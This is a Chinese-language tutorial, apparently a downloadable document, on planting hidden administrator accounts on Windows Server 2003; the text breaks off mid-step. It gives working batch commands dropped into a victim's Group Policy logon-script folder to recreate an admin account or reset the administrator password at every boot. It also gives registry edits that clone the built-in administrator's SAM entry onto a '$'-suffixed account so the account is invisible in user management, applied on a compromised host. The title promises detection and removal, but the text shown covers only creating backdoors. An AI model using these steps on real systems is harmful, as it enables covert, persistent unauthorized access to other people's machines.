服务器2003添加隐藏账号与检查删除隐藏账号教程.docxVIP

服务器添加隐藏账号和检查删除隐藏账号的方法一.建立一个别人永远删不掉的管理员用户　　操作步骤：　　1、在自己电脑里面建立一个.txt文本文件.　　2、在里面输入内容　　@echooff　　netuseryixiao123456/add注释：前面yixiao是用户名后面123456是密码;　　netlocalgroupadministratorsyixiao/add　　3、把这个文件保存，更改后缀为yixiao.bat注释：前面名字随便，后面格式一定要是bat;　　4、把这个文件拷贝到对方电脑C:\WINNT\system32\GroupPolicy\User\Scripts\Logon文件目录下，没有的话自己创建。　　完成，下次对方电脑无论如何都有这个管理员帐号，删除了，下次启动还有!　　如果把里面的内容改成　　@echooff　　netuseradministrator123456/add　　意思是不管你怎么改，下次启动管理员帐号administrator密码一直是123456。　　二.俺认为上述的方法并不理想，可以用隐藏帐号方法来建帐号会更好。　　操作步骤：　　1、首先建立一个帐号结尾要带$号,如果yixiao$，密码自己随便，然后把帐号删除.　　2、将以下代码保存成(.reg)注册表形式　　代码如下：　　-------------------------------------------------------------------------------　　WindowsRegistryEditorVersion5.00　　[HKEY_LOCAL_MACHONE\SAM\SAM\Domains\Account\users\　　names\yixiao$]　　@=hex(1f4):　　-------------------------------------------------------------------------------　　说明：1f4是Administrator帐号十六进制的值　　3、保存好后导入，然后用CMD命令设置密码　　netuseryixiao$123456　　这样一个隐形帐号就建立好了，用户在“本地用户和组”内根本无法看到这个帐号。所以也不存在删除帐号。记得千万别在同事的电脑上捣鼓哦，如果被查出来。。。。。嘿嘿:-)　　隐藏管理员帐号三分钟搞定　　对regedit.exe我想大家都很熟悉，但却不能对注册表的项键设置权限，而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\\SAM\\SAM键下，但是除了系统用户SYSTEM外，其它用户都无权查看到里面的信息，因此我首先用regedt32.exe对SAM键为我设置为“完全控制”权限。这样就可以对SAM键内的信息进行读写了了。具体步聚如下：　　1、假设我们是以超级用户administrator登录到开有终端服务的肉鸡上的，首先在命令行下或帐户管理器中建立一个帐户:hacker$,这里我在命令行下建立这个帐户netuserhacker$1234/add　　2、在开始/运行中输入:regedt32.exe并回车来运行regedt32.exe。　　3、点“权限”以后会弹出窗口点添加将我登录时的帐户添加到安全栏内，这里我是以administrator的身份登录的，所以我就将administrator加入，并设置权限为“完全控制。这里需要说明一下:最好是添加你登录的帐户或帐户所在的组，切莫修改原有的帐户或组，否则将会带来一系列不必要的问题。等隐藏超级用户建好以，再来这里将你添加的帐户删除即可。　　4、再点“开始”→“运行”并输入regedit.exe回车,启动注册表编辑器regedit.exe。打开键：HKEY_LOCAL_MAICHINE\\SAM\\SAM\\Domains\\account\\user\\names\\hacker$　　5、将项hacker$000001F4导出为hacker.reg、409.reg、1f4.reg，用记事本分别打这几个导出的文件进行编辑，将超级用户对应的项000001F4下的键F的值复制，并覆盖hacker$对应的的键F的值,然后再reg与hacker.reg合并。　　6、在命令行下执行netuserhacker$/del将用户hacker$删除：netuserhacker$/del　　7、在regedit.ex